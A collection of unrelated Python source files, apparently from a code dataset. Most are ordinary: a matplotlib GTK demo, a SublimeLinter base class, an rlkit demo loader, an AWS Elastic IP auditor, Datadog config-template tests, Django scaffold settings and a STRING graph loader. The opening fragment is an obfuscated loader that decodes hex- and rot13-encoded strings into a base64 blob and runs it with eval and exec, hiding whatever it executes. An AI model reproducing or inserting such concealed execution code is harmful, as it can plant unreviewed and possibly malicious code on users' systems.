XPJyjXPxX'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec')) |
py | 7dfd19f229b1f1b8c0b576ae7ca8fae9ed8bf0de | import click
import sys
sys.path.insert(0,'../../../tools')
from cli_npm import cli_npm
from cli_webpack import cli_webpack
if __name__ == '__main__':
cli = click.CommandCollection(sources=[cli_npm, cli_webpack])
cli()
|
py | 7dfd1a5c56d5f98a9a5c4e2b7647e7999fc7e254 | """
=========================
Embedding In GTK3 Panzoom
=========================
Demonstrate NavigationToolbar with GTK3 accessed via pygobject.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from matplotlib.backends.backend_gtk3 import (
NavigationToolbar2GTK3 as NavigationToolbar)
from matplotlib.backends.backend_gtk3agg import (
FigureCanvasGTK3Agg as FigureCanvas)
from matplotlib.figure import Figure
import numpy as np
win = Gtk.Window()
win.connect("delete-event", Gtk.main_quit)
win.set_default_size(400, 300)
win.set_title("Embedding in GTK")
f = Figure(figsize=(5, 4), dpi=100)
a = f.add_subplot(1, 1, 1)
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2*np.pi*t)
a.plot(t, s)
vbox = Gtk.VBox()
win.add(vbox)
# Add canvas to vbox
canvas = FigureCanvas(f) # a Gtk.DrawingArea
vbox.pack_start(canvas, True, True, 0)
# Create toolbar
toolbar = NavigationToolbar(canvas, win)
vbox.pack_start(toolbar, False, False, 0)
win.show_all()
Gtk.main()
|
py | 7dfd1af816692705ddd779eacb641205e28d1661 | # base_linter.py - base class for linters
import os
import os.path
import json
import re
import subprocess
import sublime
# If the linter uses an executable that takes stdin, use this input method.
INPUT_METHOD_STDIN = 1
# If the linter uses an executable that does not take stdin but you wish to use
# a temp file so that the current view can be linted interactively, use this input method.
# If the current view has been saved, the tempfile will have the same name as the
# view's file, which is necessary for some linters.
INPUT_METHOD_TEMP_FILE = 2
# If the linter uses an executable that does not take stdin and you wish to have
# linting occur only on file load and save, use this input method.
INPUT_METHOD_FILE = 3
CONFIG = {
# The display language name for this linter.
'language': '',
# Linters may either use built in code or use an external executable. This item may have
# one of the following values:
#
# string - An external command (or path to a command) to execute
# None - The linter is considered to be built in
#
# Alternately, your linter class may define the method get_executable(),
# which should return the three-tuple (<enabled>, <executable>, <message>):
# <enabled> must be a boolean than indicates whether the executable is available and usable.
# If <enabled> is True, <executable> must be one of:
# - A command string (or path to a command) if an external executable will be used
# - None if built in code will be used
# - False if no suitable executable can be found or the linter should be disabled
# for some other reason.
# <message> is the message that will be shown in the console when the linter is
# loaded, to aid the user in knowing what the status of the linter is. If None or an empty string,
# a default message will be returned based on the value of <executable>. Otherwise it
# must be a string.
'executable': None,
# If an external executable is being used, this item specifies the arguments
# used when checking the existence of the executable to determine if the linter can be enabled.
# If more than one argument needs to be passed, use a tuple/list.
# Defaults to '-v' if this item is missing.
'test_existence_args': '-v',
# If an external executable is being used, this item specifies the arguments to be passed
# when linting. If there is more than one argument, use a tuple/list.
# If the input method is anything other than INPUT_METHOD_STDIN, put a {filename} placeholder in
# the args where the filename should go.
#
# Alternately, if your linter class may define the method get_lint_args(), which should return
# None for no arguments or a tuple/list for one or more arguments.
'lint_args': None,
# If an external executable is being used, the method used to pass input to it. Defaults to STDIN.
'input_method': INPUT_METHOD_STDIN
}
TEMPFILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'..', u'.tempfiles'))
JSON_MULTILINE_COMMENT_RE = re.compile(r'\/\*[\s\S]*?\*\/')
JSON_SINGLELINE_COMMENT_RE = re.compile(r'\/\/[^\n\r]*')
if not os.path.exists(TEMPFILES_DIR):
os.mkdir(TEMPFILES_DIR)
class BaseLinter(object):
'''A base class for linters. Your linter module needs to do the following:
- Set the relevant values in CONFIG
- Override built_in_check() if it uses a built in linter. You may return
whatever value you want, this value will be passed to parse_errors().
- Override parse_errors() and populate the relevant lists/dicts. The errors
argument passed to parse_errors() is the output of the executable run through strip().
If you do subclass and override __init__, be sure to call super(MyLinter, self).__init__(config).
'''
JSC_PATH = '/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/Resources/jsc'
LIB_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'libs'))
JAVASCRIPT_ENGINES = ['node', 'jsc']
JAVASCRIPT_ENGINE_NAMES = {'node': 'node.js', 'jsc': 'JavaScriptCore'}
JAVASCRIPT_ENGINE_WRAPPERS_PATH = os.path.join(LIB_PATH, 'jsengines')
def __init__(self, config):
self.language = config['language']
self.enabled = False
self.executable = config.get('executable', None)
self.test_existence_args = config.get('test_existence_args', ['-v'])
self.js_engine = None
if isinstance(self.test_existence_args, basestring):
self.test_existence_args = (self.test_existence_args,)
self.input_method = config.get('input_method', INPUT_METHOD_STDIN)
self.filename = None
self.lint_args = config.get('lint_args', [])
if isinstance(self.lint_args, basestring):
self.lint_args = [self.lint_args]
def check_enabled(self, view):
if hasattr(self, 'get_executable'):
try:
self.enabled, self.executable, message = self.get_executable(view)
if self.enabled and not message:
message = 'using "{0}"'.format(self.executable) if self.executable else 'built in'
except Exception as ex:
self.enabled = False
message = unicode(ex)
else:
self.enabled, message = self._check_enabled(view)
return (self.enabled, message or '<unknown reason>')
def _check_enabled(self, view):
if self.executable is None:
return (True, 'built in')
elif isinstance(self.executable, basestring):
self.executable = self.get_mapped_executable(view, self.executable)
elif isinstance(self.executable, bool) and self.executable is False:
return (False, 'unknown error')
else:
return (False, 'bad type for CONFIG["executable"]')
# If we get this far, the executable is external. Test that it can be executed
# and capture stdout and stderr so they don't end up in the system log.
try:
args = [self.executable]
args.extend(self.test_existence_args)
subprocess.Popen(args, startupinfo=self.get_startupinfo(),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
except OSError:
return (False, '"{0}" cannot be found'.format(self.executable))
return (True, 'using "{0}" for executable'.format(self.executable))
def _get_lint_args(self, view, code, filename):
if hasattr(self, 'get_lint_args'):
return self.get_lint_args(view, code, filename) or []
else:
lintArgs = self.lint_args or []
settings = view.settings().get('SublimeLinter', {}).get(self.language, {})
if settings:
if 'lint_args' in settings:
lintArgs = settings['lint_args']
cwd = settings.get('working_directory', '').encode('utf-8')
if cwd and os.path.isabs(cwd) and os.path.isdir(cwd):
os.chdir(cwd)
return [arg.format(filename=filename) for arg in lintArgs]
def built_in_check(self, view, code, filename):
return ''
def executable_check(self, view, code, filename):
args = [self.executable]
tempfilePath = None
if self.input_method == INPUT_METHOD_STDIN:
args.extend(self._get_lint_args(view, code, filename))
elif self.input_method == INPUT_METHOD_TEMP_FILE:
if filename:
filename = os.path.basename(filename)
else:
filename = u'view{0}'.format(view.id())
tempfilePath = os.path.join(TEMPFILES_DIR, filename)
with open(tempfilePath, 'w') as f:
f.write(code)
args.extend(self._get_lint_args(view, code, tempfilePath))
code = u''
elif self.input_method == INPUT_METHOD_FILE:
args.extend(self._get_lint_args(view, code, filename))
code = u''
else:
return u''
try:
process = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=self.get_startupinfo())
process.stdin.write(code)
result = process.communicate()[0]
finally:
if tempfilePath:
os.remove(tempfilePath)
return result.strip()
def parse_errors(self, view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages):
pass
def add_message(self, lineno, lines, message, messages):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
lines.add(lineno)
message = message[0].upper() + message[1:]
# Remove trailing period from error message
if message[-1] == '.':
message = message[:-1]
if lineno in messages:
messages[lineno].append(message)
else:
messages[lineno] = [message]
def underline_range(self, view, lineno, position, underlines, length=1):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
line = view.full_line(view.text_point(lineno, 0))
position += line.begin()
for i in xrange(length):
underlines.append(sublime.Region(position + i))
def underline_regex(self, view, lineno, regex, lines, underlines, wordmatch=None, linematch=None):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
lines.add(lineno)
offset = 0
line = view.full_line(view.text_point(lineno, 0))
lineText = view.substr(line)
if linematch:
match = re.match(linematch, lineText)
if match:
lineText = match.group('match')
offset = match.start('match')
else:
return
iters = re.finditer(regex, lineText)
results = [(result.start('underline'), result.end('underline')) for result in iters if not wordmatch or result.group('underline') == wordmatch]
# Make the lineno one-based again for underline_range
lineno += 1
for start, end in results:
self.underline_range(view, lineno, start + offset, underlines, end - start)
def underline_word(self, view, lineno, position, underlines):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
line = view.full_line(view.text_point(lineno, 0))
position += line.begin()
word = view.word(position)
underlines.append(word)
def run(self, view, code, filename=None):
self.filename = filename
if self.executable is None:
errors = self.built_in_check(view, code, filename)
else:
errors = self.executable_check(view, code, filename)
lines = set()
errorUnderlines = [] # leave this here for compatibility with original plugin
errorMessages = {}
violationUnderlines = []
violationMessages = {}
warningUnderlines = []
warningMessages = {}
self.parse_errors(view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages)
return lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages
def get_mapped_executable(self, view, default):
map = view.settings().get('sublimelinter_executable_map')
if map:
lang = self.language.lower()
if lang in map:
return map[lang].encode('utf-8')
return default
def get_startupinfo(self):
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
return info
def execute_get_output(self, args):
try:
return subprocess.Popen(args, self.get_startupinfo()).communicate()[0]
except:
return ''
def jsc_path(self):
'''Return the path to JavaScriptCore. Use this method in case the path
has to be dynamically calculated in the future.'''
return self.JSC_PATH
def find_file(self, filename, view):
'''Find a file with the given name, starting in the view's directory,
then ascending the file hierarchy up to root.'''
path = (view.file_name() or '').encode('utf-8')
# quit if the view is temporary
if not path:
return None
dirname = os.path.dirname(path)
while True:
path = os.path.join(dirname, filename)
if os.path.isfile(path):
with open(path, 'r') as f:
return f.read()
# if we hit root, quit
parent = os.path.dirname(dirname)
if parent == dirname:
return None
else:
dirname = parent
def strip_json_comments(self, json_str):
stripped_json = JSON_MULTILINE_COMMENT_RE.sub('', json_str)
stripped_json = JSON_SINGLELINE_COMMENT_RE.sub('', stripped_json)
return json.dumps(json.loads(stripped_json))
def get_javascript_args(self, view, linter, code):
path = os.path.join(self.LIB_PATH, linter)
options = self.get_javascript_options(view)
if options is None:
options = json.dumps(view.settings().get('%s_options' % linter) or {})
self.get_javascript_engine(view)
engine = self.js_engine
if (engine['name'] == 'jsc'):
args = [engine['wrapper'], '--', path + os.path.sep, str(code.count('\n')), options]
else:
args = [engine['wrapper'], path + os.path.sep, options]
return args
def get_javascript_options(self, view):
'''Subclasses should override this if they want to provide options
for a JavaScript-based linter. If the subclass cannot provide
options, it should return None (or not return anything).'''
return None
def get_javascript_engine(self, view):
if self.js_engine is None:
for engine in self.JAVASCRIPT_ENGINES:
if engine == 'node':
try:
path = self.get_mapped_executable(view, 'node')
subprocess.call([path, u'-v'], startupinfo=self.get_startupinfo())
self.js_engine = {
'name': engine,
'path': path,
'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'),
}
break
except OSError:
pass
elif engine == 'jsc':
if os.path.exists(self.jsc_path()):
self.js_engine = {
'name': engine,
'path': self.jsc_path(),
'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'),
}
break
if self.js_engine is not None:
return (True, self.js_engine['path'], 'using {0}'.format(self.JAVASCRIPT_ENGINE_NAMES[self.js_engine['name']]))
# Didn't find an engine, tell the user
engine_list = ', '.join(self.JAVASCRIPT_ENGINE_NAMES.values())
return (False, '', 'One of the following JavaScript engines must be installed: ' + engine_list)
|
py | 7dfd1bc923bb1ff8586b3632151933b8c0a7bcc0 | from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch import nn as nn
import torch.nn.functional as F
import rlkit.torch.pytorch_util as ptu
from rlkit.misc.eval_util import create_stats_ordered_dict
from rlkit.torch.torch_rl_algorithm import TorchTrainer
from rlkit.misc.asset_loader import load_local_or_remote_file
import random
from rlkit.torch.core import np_to_pytorch_batch
from rlkit.data_management.path_builder import PathBuilder
# import matplotlib
# matplotlib.use('TkAgg')
# import matplotlib.pyplot as plt
from rlkit.core import logger
import glob
class EncoderPathLoader:
"""
Path loader for that loads obs-dict demonstrations
into a Trainer with EnvReplayBuffer
"""
def __init__(
self,
trainer,
replay_buffer,
demo_train_buffer,
demo_test_buffer,
demo_paths=[], # list of dicts
demo_train_split=0.9,
add_demos_to_replay_buffer=True,
bc_num_pretrain_steps=0,
bc_batch_size=64,
bc_weight=1.0,
rl_weight=1.0,
q_num_pretrain_steps=0,
weight_decay=0,
eval_policy=None,
recompute_reward=False,
env_info_key=None,
obs_key=None,
load_terminals=True,
**kwargs
):
self.trainer = trainer
self.add_demos_to_replay_buffer = add_demos_to_replay_buffer
self.demo_train_split = demo_train_split
self.replay_buffer = replay_buffer
self.demo_train_buffer = demo_train_buffer
self.demo_test_buffer = demo_test_buffer
self.demo_paths = demo_paths
self.bc_num_pretrain_steps = bc_num_pretrain_steps
self.q_num_pretrain_steps = q_num_pretrain_steps
self.demo_trajectory_rewards = []
self.env_info_key = env_info_key
self.obs_key = obs_key
self.recompute_reward = recompute_reward
self.load_terminals = load_terminals
self.trainer.replay_buffer = self.replay_buffer
self.trainer.demo_train_buffer = self.demo_train_buffer
self.trainer.demo_test_buffer = self.demo_test_buffer
def load_path(self, path, replay_buffer, obs_dict=None):
rewards = []
path_builder = PathBuilder()
print("loading path, length", len(path["observations"]), len(path["actions"]))
H = min(len(path["observations"]), len(path["actions"]))
print("actions", np.min(path["actions"]), np.max(path["actions"]))
for i in range(H):
if obs_dict:
ob = path["observations"][i][self.obs_key]
next_ob = path["next_observations"][i][self.obs_key]
else:
ob = path["observations"][i]
next_ob = path["next_observations"][i]
action = path["actions"][i]
reward = path["rewards"][i]
terminal = path["terminals"][i]
if not self.load_terminals:
terminal = np.zeros(terminal.shape)
agent_info = path["agent_infos"][i]
env_info = path["env_infos"][i]
if self.recompute_reward:
reward = self.env.compute_reward(
action,
next_ob,
)
reward = np.array([reward])
rewards.append(reward)
terminal = np.array([terminal]).reshape((1, ))
path_builder.add_all(
observations=ob,
actions=action,
rewards=reward,
next_observations=next_ob,
terminals=terminal,
agent_infos=agent_info,
env_infos=env_info,
)
self.demo_trajectory_rewards.append(rewards)
path = path_builder.get_all_stacked()
replay_buffer.add_path(path)
print("path sum rewards", sum(rewards), len(rewards))
# self.env.initialize(zs)
def load_demos(self, ):
# Off policy
for demo_path in self.demo_paths:
self.load_demo_path(**demo_path)
# Parameterize which demo is being tested (and all jitter variants)
# If is_demo is False, we only add the demos to the
# replay buffer, and not to the demo_test or demo_train buffers
def load_demo_path(self, path, is_demo, obs_dict, train_split=None):
print("loading off-policy path", path)
data = list(load_local_or_remote_file(path))
# if not is_demo:
# data = [data]
# random.shuffle(data)
if train_split is None:
train_split = self.demo_train_split
N = int(len(data) * train_split)
print("using", N, "paths for training")
if self.add_demos_to_replay_buffer:
for path in data[:N]:
self.load_path(path, self.replay_buffer, obs_dict=obs_dict)
if is_demo:
for path in data[:N]:
self.load_path(path, self.demo_train_buffer, obs_dict=obs_dict)
for path in data[N:]:
self.load_path(path, self.demo_test_buffer, obs_dict=obs_dict)
def get_batch_from_buffer(self, replay_buffer):
batch = replay_buffer.random_batch(self.bc_batch_size)
batch = np_to_pytorch_batch(batch)
# obs = batch['observations']
# next_obs = batch['next_observations']
# goals = batch['resampled_goals']
# import ipdb; ipdb.set_trace()
# batch['observations'] = torch.cat((
# obs,
# goals
# ), dim=1)
# batch['next_observations'] = torch.cat((
# next_obs,
# goals
# ), dim=1)
return batch
|
py | 7dfd1c7e5eba6fdfc9d1b7c91958e601880f7265 | #!/usr/bin/env python
'''
Class that allows us to take all unused ip addresses for a region, and search
through all security groups for its reference.
Options:
--region (optional, example: us-east-1, example: --all [searches all regions])
--ip_addresses (string): one or multiple ip addresses, comma separated, no spaces
'''
import os
import argparse
import boto3
from eip_auditor.lib import base
from emojipedia import Emojipedia
class Client(object):
"""docstring for Client.
@attributes:
client: An instance of the ECR boto3 client.
"""
def __init__(self, region=None, cidr=None):
"""Initializer
Args:
region (str): the aws region to check for unused IP Addreses
cidr (str|list): a list of ip addresses to search for in security groups
Returns:
String
"""
super(Client, self).__init__()
self.regions = []
self.default_region = 'us-east-1'
self.__set_region__(region)
self.access_key = os.getenv('AWS_ACCESS_KEY_ID', None)
self.secret_key = os.getenv('AWS_SECRET_ACCESS_KEY', None)
self.session = None
self.client = None
self.cidr = cidr
def perform(self):
"""Main method to be called to run this application.
Args:
N/A
Returns:
N/A
"""
print "Searching for usage in {}:\n".format(self.regions)
for i in self.regions:
self.session = boto3.Session(region_name=i)
self.client = self.session.client('ec2')
cidr_list = self.__set_cidr_list__(self.cidr, i)
if len(cidr_list) < 1:
print Emojipedia.search('smiling-face-with-smiling-eyes').character + " No unused IP addresses found " + Emojipedia.search('smiling-face-with-smiling-eyes').character
else:
for cidr in cidr_list:
print "\t{}/32".format(cidr)
print "\n"
self.describe_security_groups(cidr_list)
print "\n\n"
def describe_unused_ip_addresses(self):
"""Find unused IP addresses from a dict and map the names to a list
Args:
N/A
Returns:
rtn (list): List of unused IP Addresses
"""
rtn = []
for k in self.client.describe_addresses()['Addresses']:
if ('AssociationId' in k) or ('InstanceId' in k) or ('PrivateIpAddress' in k) or 'NetworkInterfaceId' in k:
continue
rtn.append(k['PublicIp'])
return rtn
def describe_security_groups(self, cidr_list):
"""Find unused IP addresses from a dict and map the names to a list
Args:
N/A
Returns:
rtn (list): List of unused IP Addresses
"""
filters = []
cidr_inbound_permission = {
'Name': 'ip-permission.cidr',
'Values': []
}
for k in cidr_list:
cidr_inbound_permission['Values'].append(
[
"{}/32".format(k)
]
)
cidr_inbound_permission['Values'] = base.flatten(cidr_inbound_permission['Values'])
filters.append(cidr_inbound_permission)
rtn = self.client.describe_security_groups(
Filters=filters
)
found_mapping = {}
if len(rtn['SecurityGroups']) > 0:
print Emojipedia.search('loudly-crying-face').character + " Found Unused IP Address(es) in the following SGs: " + Emojipedia.search('loudly-crying-face').character
for k in rtn['SecurityGroups']:
found_mapping[k['GroupId']] = []
for j in k['IpPermissions']:
for l in j['IpRanges']:
if l['CidrIp'] in cidr_inbound_permission['Values']:
found_mapping[k['GroupId']].append(l['CidrIp'])
for k in found_mapping:
print k + ": "
for j in found_mapping[k]:
print "\t" + j
print "\n"
else:
print Emojipedia.search('smiling-face-with-smiling-eyes').character + " Unused IP Addresses do not exist in any security group " + Emojipedia.search('smiling-face-with-smiling-eyes').character
return found_mapping
def __set_cidr_list__(self, cidr, region):
"""Determine which IP Addresses to look at, either determined by the user
or by a region list
Args:
cidr (str/list): cidr list or string determined by the user
region (str): the aws region to look in
Returns:
cidr_list (list): list of unused IP Addresses for a specific region
"""
cidr_list = []
if cidr is None:
print "Found the following unused EIPs in {}".format(region)
cidr_list = self.describe_unused_ip_addresses()
elif isinstance(cidr, basestring):
print "Setting CIDR list to argument value specified"
split = self.cidr.split(",")
cidr_list = split
return cidr_list
def __set_region__(self, region):
"""Determine which regions to look for unused IP Addresses in
Args:
region (str): the region passed by args
Returns:
N/A
"""
if region is None:
raise "Region not set."
elif region == "all":
self.regions = []
for i in boto3.client('ec2', region_name=self.default_region).describe_regions()['Regions']:
self.regions.append(i['RegionName'])
else:
self.regions = [region]
|
py | 7dfd1d35f6e7644e05696f8b7ef85f8698aa1f62 | # (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
import pytest
from datadog_checks.dev import TempDir
from datadog_checks.dev.tooling.configuration.template import ConfigTemplates
from datadog_checks.dev.utils import ensure_parent_dir_exists, path_join, write_file
pytestmark = [pytest.mark.conf, pytest.mark.conf_template]
class TestLoadBasic:
def test_default(self):
templates = ConfigTemplates()
assert templates.load('init_config/tags') == {
'name': 'tags',
'value': {
'example': ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>'],
'type': 'array',
'items': {'type': 'string'},
},
'description': (
'A list of tags to attach to every metric and service check emitted by this integration.\n'
'\n'
'Learn more about tagging at https://docs.datadoghq.com/tagging\n'
),
}
def test_custom_path_precedence(self):
with TempDir() as d:
template_file = path_join(d, 'init_config', 'tags.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, 'test:\n- foo\n- bar')
templates = ConfigTemplates([d])
assert templates.load('init_config/tags') == {'test': ['foo', 'bar']}
def test_cache(self):
with TempDir() as d:
template_file = path_join(d, 'init_config', 'tags.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, 'test:\n- foo\n- bar')
templates = ConfigTemplates([d])
templates.load('init_config/tags')
write_file(template_file, '> invalid')
assert templates.load('init_config/tags') == {'test': ['foo', 'bar']}
def test_unknown_template(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `unknown` does not exist$'):
templates.load('unknown')
def test_parse_error(self):
with TempDir() as d:
template_file = path_join(d, 'invalid.yaml')
ensure_parent_dir_exists(template_file)
write_file(template_file, '> invalid')
templates = ConfigTemplates([d])
with pytest.raises(ValueError, match='^Unable to parse template `{}`'.format(re.escape(template_file))):
templates.load('invalid')
class TestLoadBranches:
def test_mapping(self):
templates = ConfigTemplates()
assert templates.load('init_config/tags.value.example') == ['<KEY_1>:<VALUE_1>', '<KEY_2>:<VALUE_2>']
def test_mapping_not_found(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `init_config/tags` has no element `value.foo`$'):
templates.load('init_config/tags.value.foo')
def test_list(self):
templates = ConfigTemplates()
assert templates.load('instances/http.skip_proxy.value') == {'example': False, 'type': 'boolean'}
def test_list_not_found(self):
templates = ConfigTemplates()
with pytest.raises(ValueError, match='^Template `instances/http` has no named element `foo`$'):
templates.load('instances/http.foo')
def test_primitive(self):
templates = ConfigTemplates()
assert templates.load('instances/http.skip_proxy.value.example') is False
def test_primitive_recurse(self):
templates = ConfigTemplates()
with pytest.raises(
ValueError,
match=(
'^Template `instances/http.skip_proxy.value.example` does '
'not refer to a mapping, rather it is type `bool`$'
),
):
templates.load('instances/http.skip_proxy.value.example.foo')
class TestApplyOverrides:
def test_mapping(self):
templates = ConfigTemplates()
template = templates.load('init_config/tags')
errors = templates.apply_overrides(template, {'value.example': ['foo', 'bar']})
assert not errors
assert template == {
'name': 'tags',
'value': {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}},
'description': (
'A list of tags to attach to every metric and service check emitted by this integration.\n'
'\n'
'Learn more about tagging at https://docs.datadoghq.com/tagging\n'
),
}
def test_mapping_with_branches(self):
templates = ConfigTemplates()
template = templates.load('init_config/tags.value')
errors = templates.apply_overrides(template, {'example': ['foo', 'bar']})
assert not errors
assert template == {'example': ['foo', 'bar'], 'type': 'array', 'items': {'type': 'string'}}
def test_mapping_with_name(self):
templates = ConfigTemplates()
template = templates.load('instances/tags')
overrides = {'tags.required': True}
templates.apply_overrides(template, overrides)
assert not overrides
assert template.get('required') is True
def test_list(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'skip_proxy.description': 'foobar'})
assert not errors
assert {
'name': 'skip_proxy',
'value': {'example': False, 'type': 'boolean'},
'description': 'foobar',
} in template
def test_list_with_branches(self):
templates = ConfigTemplates()
template = templates.load('instances/http.skip_proxy')
errors = templates.apply_overrides(template, {'description': 'foobar'})
assert not errors
assert template == {
'name': 'skip_proxy',
'value': {'example': False, 'type': 'boolean'},
'description': 'foobar',
}
def test_list_replace(self):
templates = ConfigTemplates()
original_template = templates.load('instances/http')
index = next(i for i, item in enumerate(original_template) if item.get('name') == 'skip_proxy') # no cov
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'skip_proxy': 'foobar'})
assert not errors
assert 'foobar' in template
assert template.index('foobar') == index
template.remove('foobar')
for item in template:
assert item.get('name') != 'skip_proxy'
def test_list_not_found(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.value.properties.foo.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.value.properties` has no named mapping `foo`'
def test_list_not_found_root(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override has no named mapping `foo`'
def test_primitive(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.description.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.description` does not refer to a mapping'
def test_primitive_recurse(self):
templates = ConfigTemplates()
template = templates.load('instances/http')
errors = templates.apply_overrides(template, {'proxy.description.foo.foo': 'bar'})
assert len(errors) == 1
assert errors[0] == 'Template override `proxy.description` does not refer to a mapping'
|
py | 7dfd1e6220e1d27d77d7f5069d12cae497896556 | """
Django settings for proj project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-v&na%llzfvn&^%_ezvru%$zs2%7wl7zfh26+demp!o)0q)x&4u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'words'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'proj.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'proj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
py | 7dfd1e73b9443579ca81ffdc8faa1b23b60696dc | """
This file offers the methods to automatically retrieve the graph Marinimicrobium sp. LS-A18.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def MarinimicrobiumSpLsA18(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Marinimicrobium sp. LS-A18 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
